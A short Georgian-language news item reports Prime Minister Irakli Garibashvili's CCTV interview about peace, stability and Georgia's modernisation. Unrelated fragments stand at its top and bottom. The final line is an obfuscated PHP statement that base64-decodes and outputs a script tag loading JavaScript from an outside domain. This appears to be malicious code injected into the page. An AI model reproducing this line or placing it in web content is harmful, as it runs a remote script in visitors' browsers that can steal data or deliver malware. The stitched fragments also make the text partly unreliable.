celsiusi
ავერსი შნაიდერი

ჩემი ხედვა საქართველოსთან მიმართებით გულისხმობს მეტი კეთილდღეობის, განვითარებისა და წინსვლის, სწრაფი მოდერნიზაციისა და ტრანსფორმაციის უზრუნველყოფას ჩვენი ხალხისთვის, საქართველო შეიძლება, იქცეს მშვიდობის, სტაბილურობისა და კეთილდღეობის ქვეყნად, – ამის შესახებ საქართველოს პრემიერ–მინისტრმა, ირაკლი ღარიბაშვილმა ჩინეთის ცენტრალურ ტელევიზიასთან (CCTV) ექსკლუზიურ ინტერვიუში განაცხადა.

პრემიერ–მინისტრმა აღნიშნა, რომ საქართველოს მთავრობა მშვიდობაზეა ორიენტირებული და ამ პრაგმატული, კონსტრუქციული პოლიტიკით სვლას გააგრძელებენ, რაც მიზნად ისახავს არსებული პრობლემების მშვიდობიანი გზით გადაჭრას.

„ჩემი მთავრობა მშვიდობაზეა ორიენტირებული. ჩვენ გვსურს მშვიდობა, სტაბილურობა და კეთილდღეობა ჩვენი ხალხისთვის. ჩვენ ნამდვილად შევძელით ბოლო 10 წლის განმავლობაში მშვიდობის შენარჩუნება საქართველოში. ეს არის ერთადერთი უწყვეტი მშვიდობიანი და სტაბილური არსებობის პერიოდი. ამიტომ, გავაგრძელებთ ამ პოლიტიკით სვლას, ამ პრაგმატული, კონსტრუქციული პოლიტიკით სვლას, რაც მიზნად ისახავს ჩვენი პრობლემების მშვიდობიანი გზით გადაჭრას. ამდენად, ჩემი ხედვა საქართველოსთან მიმართებით გულისხმობს მეტი კეთილდღეობის, მეტი განვითარებისა და წინსვლის, სწრაფი მოდერნიზაციისა და ტრანსფორმაციის უზრუნველყოფას ჩვენი ხალხისთვის. საქართველო შეიძლება, იქცეს მშვიდობის, სტაბილურობისა და კეთილდღეობის ქვეყნად“,– განაცხადა ირაკლი ღარიბაშვილმა.

346
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");